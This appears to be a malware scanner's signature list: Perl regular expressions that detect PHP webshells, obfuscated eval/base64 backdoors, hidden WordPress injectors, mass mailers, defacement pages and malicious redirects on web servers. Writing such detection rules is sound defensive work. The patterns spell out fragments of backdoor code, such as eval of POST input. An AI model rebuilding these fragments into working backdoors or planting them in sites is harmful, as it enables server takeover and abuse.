qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"preg\_r\"\.\"eplace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+set\_time\_limit\(0\)\;\s+if\s+\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\=\=\'1\'\)\{echo\s+\'200\'\;\s+exit\;\}.+?if\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\=\=.+?\)eval\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+if\(md5\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\)\=\=.+?\)eval\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\?>/is,
qr/<\?php\s+class\s+\_([A-z0-9]{1,20})\{static\s+private\s+\$.+?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.+?\(\)\;exit\(\)\;/is,
qr/<\?php\s+include\(\'wp\-access\-plugin\.php\'\)\;\s+\/\/Email\s+sending\s+function\s+sending\_email\(\$email\,\$id\=\'1\'\)\{.+?<\/div>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+session\_start\(\)\;.+?function\s+sanitizer\(\$check\)\{.+?function\s+validate\_email\(\$email\)\{.+?return\s+\$status\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*\s+Net\s+Scrap\s+Shop\s+v3\*\/.+?\=str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(\$.+?\)\;\s+\?>/is,
qr/bgeteam\s+<\?php.+?B\s+Ge\s+Team\s+File\s+Manager.+?value\=\"upload\"\s+\/>.+?\?>\s+B\s+Ge\s+Team\s+File\s+Manager\s+Version\s+1\.0\,\s+Coded\s+By\s+lin\s+Email\:\s+null/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\?>\s+Upload\s+is\s+<b><color>WORKING.+?<\?php\s+if\s+\(\!empty\(\$\_POST\[.+?\}\s+\?>/is,
qr/<\?php\s+\/\*\*.+?\$auth\_pass\s+\=\s+\".+?echo\s+\'changepassword\'\;.+?echo\s+\'Yeahhh\'\;.+?\*\/\s+\}\s+\?>/is,
qr/<\?php.+?Mr\.N00B\s+Mini\s+Shell.+?\$auth\_pass\s+\=.+?eval\(\$st\(\$gz\(\$st2\(\$bs\(\(\$con7ext\)\)\)\)\)\)\;/is,
qr/<\?php\s+\/\*\*\s+\*\s+Leaf.+?\$sessioncode\s+\=\s+md5\(\_\_FILE\_\_\)\;.+?Leaf\s+PHPMailer.+?\}\s+print\s+\'<\/body>\'\;\s+\?>/is,
qr/<title>Hacked\s+By\s+Dr34mCyb3r.+?<\/style>\s+<div\s+class\=\"video\-background.+?allowfullscreen><\/iframe>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'ba\'\.\'se64\_dec\'\.\'o\'\.\'d\'\.\'e\'\.\'\'\;\s+\@eval\(\$([A-z0-9]{1,20})\(.+?\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?\'\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\'\'\,\'.+?\;\$([A-z0-9]{1,20})\.\=\"\\x\d\w\\x\d\d\"\;\s+\$([A-z0-9]{1,20})\.\=\".+?\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\)\;\?>/is,
qr/<\?php\s+if\(isset\(\$\_SERVER\[\"HTTP\_USER_AGENT\"\]\)\s+\&\&\s+\!empty\(\$\_SERVER\[\"HTTP\_USER\_AGENT\"\]\)\s+\&\&\s+\!preg\_match\(\"\/google\|bot\|msn\|spider\|crawl\|spam\/i\"\,\$\_SERVER\[\"HTTP\_USER\_AGENT\"\]\)\)\s+\{\s+header\(\"Location\:\s+http\:\/\/.+?\"\)\;\}\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$.+?\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?\=\s+\'i\'\s+\.\'m\'\s+\.\'p\'\s+\.\'l\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?array\(.+?eval.+?\?>/is,
qr/<\?php\s+\$.+?\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?\(\'e\'\.\'d\'\.\'o\'\.\'c\'\.\'e\'\.\'d\'\.\'\_\'\.\'4\'\.\'6\'\.\'e\'\.\'s\'\.\'a\'\.\'b\'\)\;\$.+?eval.+?\?>/is,
qr/<\?php\s+\$.+?\=\s+\'str\'\.\'rev\'\;\$.+?array.+?\(\'edolpmi\'\)\;\$.+?eval.+?\?>/is,
qr/<\?php.+?1337.+?\?>\s+<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?eval\(\"\?>\"\.\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*.+?UBH\s+CSU.+?add\_action\(\"\\x.+?plugins\_url\(.+?\?>/is,
qr/<\?php\s+\$\{\"GLOBAL\\x.+?\"\]\,\"\"\.\$\_FILES\[\".+?\"\]\}\=str\_replace\(\".+?\"\;\}\}\s+\?>/is,
qr/<\?php\s+\/\*\s+b374k.+?if\(isset\(\$\_COOKIE\[\'b374k\'\]\)\)\{.+?\.\$s\_name\;\s+\?><\/p>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+function\s+sgen\(\)\s+\{\$vals\s+\=\s+\"abcdefghijklmnopqrstuvwxyz\"\;\s+\$result\s+\=\s+\"\"\;\s+for\(\$i.+?\.sgen\(\)\.\"\=\"\.bin2hex\(\$\_SERVER\[.+?exit\;\s+\?>/is,
qr/<\?php\s+\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"\\x\d\d.+?\\x3b\"\)\;\s+\?>/is,
qr/<\?php\s+if\(\!isset\(\$GLOBALS\[\"\\x\d\d.+?\]\)\)\s+\{\s+\$ua\=strtolower\(\$\_SERVER\[\"\\x\d\d.+?\)\)\)\s+\$GLOBALS\[\"\\x\d\d.+?\]\=1\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+Array\(.+?function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{\$([A-z0-9]{1,20})\s+\=\s+\'\'\;\s+for\(\$i\=0.+?return\s+base64\_decode\(\$([A-z0-9]{1,20})\)\;\}\s+\$([A-z0-9]{1,20}).+?eval\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php.+?hello\_dolly.+?\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"\\x\d\d.+?\\x3b\"\)\;.+?add\_action\(\s+\'admin\_head\'\,\s+\'dolly\_css\'\s+\)\;\s+\?>/is,
qr/<\?php\s+\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"x.+?\"\)\;\s+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php.+?\$pos\s+\=\s+strpos\(\$haystack\,\s+\$needle\)\;.+?function\s+mailer\_spam\_cycle\(.+?\'OK\'\)\;\s+\}/is,
qr/<html>.+?parent\.window\.opener\.location\=\"http\:\/\/redirg\.info\/\?access\=.+?<\/html>/is,
qr/<\?php.+?\{if\(is\_uploaded\_file\(\$\_FILES\[\"filename\"\]\[\"tmp\_name\"\]\)\)\{.+?\@eval\(\$uidmail\)\;\s+\}/is,
qr/([0-9]{20,})<\?php\s+\@eval\(\$\_POST\[\'c\'\]\)\;\s+die\(\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;echo\'404\-NOT\-FOUND\-ERROR\'\;\s+\$([A-z0-9]{1,20})\=gzinflate\(base64\_decode\(.+?\}\}closedir\(\$([A-z0-9]{1,20})\)\;\?>/is,
qr/<\?php\s+\@eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\;\?>/is,
qr/<\?php.+?Joomla\.Site.+?\$p\s+\=\s+getcwd\(\)\;\s+echo\s+\$p\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(.+?\(\)\;\s+\?>/is,
qr/<\?PHP\s+\$login.+?\$pass.+?\$md5\_pass\s+\=\s+\"\"\;\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\/\/\?\?\?\?\?\s+\?>/is,
qr/<\?php.+?if\(\$chk\_login\s+\=\=\s+true\).+?mass\s+mailer\s+\|\:\..+?Sending\s+Completed.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php.+?\@system\(\"killall\s+\-9\s+\"\.basename\(\"\/usr\/bin\/host\"\)\)\;.+?\$so32\s+\=\s+\"\\x.+?\/usr\/bin\/host\"\)\;\s+\?>/is,
qr/<\?php\s+eval\s+\(gzinflate\(base64\_decode\(str\_rot13\(.+?\)\)\)\)\;\s+\?>/is,
qr/\#\!\/bin\/sh.+?sd\@fucksheep\.org.+?\.\/exploit\s+fi/is,
qr/<\?php.+?eMail\s+\~>\s+RealUnix\.net.+?print\s+file\_get\_contents\(\$i\)\;\s+exit\;\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php.+?class\s+viaWorm\s+\{.+?public\s+function\s+analyzePossibleIndexes\(\)\{.+?\$result\s+\=\s+viaWorm\:\:processHost\(\)\;.+?echo\s+json\_encode\(\$result\)\;\s+exit\(\)\;/is,
qr/<html>.+?Owned\s+by\s+Widex.+?root\@Widex\:\s+\.\/logout<\/p>\s+<\/body>\s+<\/html>/is,
qr/\/\*\s+exploit\s+lib\s+\*\/.+?struct\s+exploit\_state\s+\{.+?pa\_\_init\(NULL\)\;\s+return\s+0\;\s+\}/is,
qr/\/\*.+?sd\@fucksheep\.org.+?struct\s+exploit\_state\s+\{.+?unlink\(\"\.\/suckit\_selinux\_nopz\"\)\;\s+exit\(1\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\_\"\.\'G\'\.\'E\'\.\'T\'\;\s+if\s+\(isset\(\s+\$\{\$([A-z0-9]{1,20})\}\[\'\d\d\'\]\)\)\s+preg\_replace\(\'\/\'\.\'\.\*\/e\'\,\s+\'ev\'\.\'al\s+\(\s+\$\'\.\$([A-z0-9]{1,20})\.\'\[\"\d\d\"\]\)\'\,\s+\'\'\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\)eval\(\/\*\'\..+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\,\$([A-z0-9]{1,20})\(null\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\).+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\;if\(\!\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\/\*\'\.\s+\'\)\*\/\$([A-z0-9]{1,20})\)\)\,\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\(.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\..+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?die\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(false\,\/\*.+?\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\).+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\.\/\*([A-z0-9]{1,20})\'\.\s+\'\?\*\/([A-z0-9]{1,20})\.\'.+?\*\/\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$.+?\(false\,\/\*([A-z0-9]{1,20})\'\.\s+\'([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\;.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\=\=\$([A-z0-9]{1,20})\.\/\*([A-z0-9]{1,20})\'\..+?\$([A-z0-9]{1,20})\(false\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\;.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,array\(\$([A-z0-9]{1,20})\,\/\*([A-z0-9]{1,20})\'\.\s+\'([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\,\$([A-z0-9]{1,20})\)\)\;.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\*\/\$([A-z0-9]{1,20})\)\)\,\$([A-z0-9]{1,20})\)\)exit\;\$([A-z0-9]{1,20})\(\$.+?array\(\(\'.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\W.+?\*\/\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20}).+?\'\@\@\@\@.+?\)\;if\(\!\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\,\/\*\'\..+?\'\;/is,
qr/<\?php\s+\$key\=\"([A-z0-9]{32})\"\;\s+if\(md5\(\$\_COOKIE\[\"key\"\]\)\s+\=\=\s+\$key\)\s+\{\s+eval\s+\(\s+base64\_decode\s+\(\$\_POST\[\"code\"\]\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[.+?urldecode\(\$\_SERVER\[\'QUERY\_STRING\'\]\)\;.+?\$email\s+\=\s+\@base64\_decode\(\$.+?return\s+jk\_\_\_\(\$url\)\;\s+\}\s+\}\s+\}/is,
qr/<\?php\s+\$.+?\=\s+array\(\'.+?array\(\'ba\'\s+\,\'se\'\s+\,\'64\'\s+\,\'\_d\'\s+\,\'ec\'\s+\,\'od\'\s+\,\'e\'\)\;\s+\$.+?array\(\'gz\'\,\s+\'un\'\,\s+\'co\'\,\s+\'mp\'\,\s+\'re\'\,\s+\'ss\'\)\s+\;\$.+?eval.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?64\_d.+?array\(.+?eval.+?\$([A-z0-9]{1,20}).+?\?>/is,
qr/<\?php.+?\$color\s+\=\s+\"\#df5\"\;.+?FilesMan.+?\?>/is,
qr/<\?php\s+\@preg\_replace\(\"\/\[pageerror\]\/e\"\,\$\_POST\[\'([A-z0-9]{1,20})\'\]\,\"([A-z0-9]{1,20})\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(\"\w\"\,\"\"\,\"s\wtr\w\_\wr\we\wpl\wa\wc\we\"\)\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\=\=\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\w\"\,\s+\"\"\,\s+\"\wb\wa\ws\we6\w4\w_d\we\wco\wde\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\w\"\,\"\"\,\"cr\we\wat\we\w\_\wf\wu\wnc\wt\wi\won\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\'\'\,\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\"\w\"\,\s+\"\"\,\s+\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\)\;\s+\/\/\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*\*\*find\s+config\s+files\*\*\*\*\/.+?if\s+\(\!\$ErrorMsg\)\{.+?\}\s+\?>/is,
qr/<\?php\s+\$wphash.+?\$rootpath\s+\=\s+preg\_replace\(\'\/\(htdocs\|httpdocs\|www\).+?\$ErrorMsg\s+\=\s+mysql\_error\(\)\;.+?\}\s+\?>/is,
qr/<\?php\s+\$auth\_pass\s+\=.+?\(base64\_decode\(.+?\)\;\$\_\=create\_function\(\"\"\,\@gzuncompress\(\$\_\_\)\)\;\$\_\(\)\;\?>/is,
qr/<\?php\s+\$zend\_framework\=\"\\x\d\d.+?\"\;\s+\@error\_reporting\(0\)\;\s+\$zend\_framework\(\"\"\,.+?\\x\d\w\"\)\;\s+\?>/is,
qr/\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"\\x23.+?x3b\"\)\;/is,
qr/<\?php\s+if\(\@isset\(\$\_SERVER\[HTTP\_25F0C\]\)\)\{\@eval\(base64\_decode\(\$\_SERVER\[HTTP\_25F0C\]\)\)\;\}exit\;\?>/is,
qr/<\?php.+?\=\_\_FILE\_\_\;\$.+?\_\_LINE\_\_\;\$.+?eval\(\(base64\_decode\(.+?\)\)\)\;return\;\?>.+?\/([A-z0-9]{1,20})\=/is,
qr/\$([A-z0-9]{1,20})\s+\=\s+\"\/index\/\?([A-z0-9]{1,20})\"\;.+?\{\$([A-z0-9]{1,20})\=\@fopen\(\$([A-z0-9]{1,20})\,base64\_decode\(.+?\)\)\;\$([A-z0-9]{1,20})\=json\_decode\(base64\_decode\(fread\(\$([A-z0-9]{1,20})\,filesize\(.+?\{setcookie\(base64\_decode\(\'.+?\'\)\,1\,time\(\)\+43200\,base64\_decode\(\'.+?\'\)\)\;echo\s+base64\_decode\(\'([A-z0-9]{20,})\'\)\.\$([A-z0-9]{1,20})\.base64\_decode\(\'([A-z0-9]{20,})\'\)\.\$([A-z0-9]{1,20})\.base64\_decode\(\'.+?\'\)\;\}/is,
qr/<\?php\s+\@set\_time\_limit\(9999\)\;.+?\$imgurl\s+\=\s+base64\_decode\(\$\_GET\[\'getimage\'\]\)\;.+?function\s+traffic\_counter\(\)\{.+?file\_put\_contents\(\$path\,\s+\$file\)\;\s+return\s+true\;\s+\}\s+\?>/is,
qr/<\?php.+?wpsecurity.+?function\s+injectbody\_hide\(\$plugins\)\s+\{.+?\/\/\s+\}\s+\/\/\}\)\;/is,
qr/<\?php.+?wpsupercache.+?function\s+injectscr\_hide\(\$plugins\)\s+\{.+?add\_filter\(\'all\_plugins\'\,\s+\'injectscr\_hide\'\)\;/is,
qr/<script\s+data\-cfasync\=\'false\'\s+type\=\'text\/javascript\'>\s+eval\(function\(p\,a\,c\,k\,e\,d\)\{e\=function\(c\)\{return\(c<a\?\'\'\:e\(parseInt\(c\/a\)\)\).+?split\(\'\|\'\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[\'upload\'\]\)\)\{.+?if\s+\(move\_uploaded\_file\(\$\_FILES\[\'uploadfile\'\]\[\'tmp\_name\'\]\,\s+\$uploadfile\)\).+?else\s+\{header\(\'Location\:\s+\.\.\/\.\.\/\'\)\;\}\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$([A-z0-9]{1,20})\=\".+?\"\;preg\_replace\(\"\/\.\*\/e\"\,\"\\x\d\d.+?\\x3B\"\,\"\.\"\)\;\s+return\;\s+\?>/is,
qr/<\?php\s+\$\{\"\\x47LOB.+?\@ini\_set\(\"\\x65.+?WSOsetcookie\(md5\(\$\_SERVER\[.+?\.\$\_POST\[\"a\"\]\)\;exit\;\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$buffer\s+\=.+?\$newphrase\=str\_replace\(\$.+?eval\(\$\_b\(\$newphrase\)\)\;\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$s\_pass\s+\=.+?b374k.+?\,\$s\_pass\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$ver\s+\=\s+\'6\.6\.6\'\;.+?exit\(\'Access\s+Denied\'\)\;.+?if\s+\(\$cracktrack\s+\!\=\s+\$checkworm\)\s+die\(\"\"\)\;\s+\}\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$([A-z0-9]{1,20})\=.+?\\x3B\"\,\"\.\"\)\;return\;\s+\?>/is,
qr/<\?php\s+echo\s+\"<html><head>.+?echo\s+\"<\!\-\-\s+g\(\'FilesMan\'\,\'c\:\/\'\)\s+\-\-\!>\"\;.+?function\s+wscandir\(\$cwdir\)\s+\{.+?echo\s+\"<\/body><\/html>\"\;/is,
qr/\/\/eAccelerate\s+Caching\s+System.+?\!preg\_match\(\"\/\(googlebot\|msnbot\|yahoo\|search\|bing\|ask\|indexer\)\/i\".+?base64\_decode\(.+?\)\:\(\'\'\)\)\.\$output\;\}/is,
qr/<\?php\s+function\s+html\(\$data\)\s+\{\s+\$html\=implode\(.+?array\_unshift\(\$data.+?\$words\_idx\=array\_rand\(\$words\,rand\(\$min\,\$max\)\)\;.+?\"h\"\.\"tac\"\.\"c\"\.\"es\"\.\"s\"\;\$.+?header\(\"HTTP\/1\.1\s+404\s+Not\s+Found\"\)\;echo\(html\(array\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+for\(\$o\=0\,\$e\=\'.+?\'\,\$d\=\'\'\;\@ord\(\$e\[\$o\]\)\;\$o\+\+\)\{if\(\$o<16\)\{\$h\[\$e\[\$o\]\]\=\$o\;\}else\{\$d\.\=\@chr\(\(\$h\[\$e\[\$o\]\]<<4\)\+\(\$h\[\$e\[\+\+\$o\]\]\)\)\;\}\}eval\(\$d\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"PCT4BA6ODSE\_\"\;\$([A-z0-9]{1,20})\=strtolower\(\$([A-z0-9]{1,20})\[.+?\]\;if\(isset\(\$([A-z0-9]{1,20})\)\)\{eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;\}\?>/is,
qr/<\?\s+\$auth\_pass\s+\=.+?FilesMan.+?eval\(base64\_decode\(.+?return\;\s+\?>/is,
qr/RewriteEngine\s+on\s+RewriteCond\s+\%\{HTTP\_USER\_AGENT\}\s+android\s+\[NC\,OR\].+?RewriteRule\s+\^\(\.\*\)\$\s+http\:\/\/sswim\.ru\s+\[L\,R\=302\]/is,
qr/<\?php\s+\/\*\*\/\s+eval\(base64\_decode\(\"aWYo.+?\)\)\;\?>/is,
qr/<\?php.+?\$auth\_pass.+?FilesMan.+?header\(\'HTTP\/1\.0\s+404\s+Not\s+Found\'\)\;\s+exit\;/is,
qr/<div\s+id\=\'HideMeBetter\'>.+?document\.getElementById\(\'HideMeBetter\'\)\.style\.display\s+\=\s+\'none\'\;\}<\/script>/is,
qr/<\!\-\-start\-add\-div\-content\-\-><p\s+class\=\"dnn\">.+?Viagra.+?<\/p><\!\-\-end\-add\-div\-content\-\->/is,
qr/<script\s+language\=\"JavaScript\">\s+function\s+dnnViewState\(\).+?dnnViewState\(\)\;\s+<\/script>/is,
qr/<\?php\s+\$\_([A-z0-9]{1,20})\=\"\\x([A-z0-9]{2}).+?\\x([A-z0-9]{2})\"\;\$\_([A-z0-9]{1,20})\=\"\\x([A-z0-9]{2}).+?\)\)\;\$\_([A-z0-9]{1,20})\(\)\;\?>/is,
qr/<\?php.+?Parabola.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+function\s+html\(\$data\).+?array\_unshift\(\$data\,.+?array\_push\(\$parag\,\$word\)\;.+?echo\(html\(array\(.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'bas.+?array\(\'gzu.+?eval.+?\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\$.+?WP\_Error\_Page\_Not\_Found.+?\(\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\)\;\}\}\}\}\}\}\}\}\;/is,
qr/<\?php\s+error\_reporting\(0\)\;echo\(\"Form.+?\{if\(\@copy\(\$\_FILES\[\'file\'\]\[\'tmp\_name\'\].+?<br>\'\;\}\}\;\}\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\s+\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?array\(.+?eval\?>/is,
qr/<\?php\s+\$IonTester\s+\=\s+<<<EOT.+?EOT\;\s+\$Keys\s+\=\s+\$\_GET\[.+?\$run\_ioncubetesterplus\s+\=\s+create\_function\(\'\'\,\s+\"\\x.+?\$run\_ioncubetesterplus\(\)\;\s+\?>/is,
qr/if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{.+?\$data\s+\=\s+base64\_decode\(.+?die\(.+?\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\"\_([A-z0-9]{1,20})\"\s+\;\$([A-z0-9]{1,20})\s+\=strtoupper\(\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\s+\)\;\s+if\(\s+isset\(\s+\$\{\$([A-z0-9]{1,20})\}\[\s+\'([A-z0-9]{1,20})\'\s+\]\)\)\s+\{\s+eval\(\$\{\s+\$([A-z0-9]{1,20})\}\s+\[\s+\'([A-z0-9]{1,20})\'\s+\]\s+\)\s+\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\+\=\s+1\;\s+\}\s+return\s+\$([A-z0-9]{1,20})\;\s+\}/is,
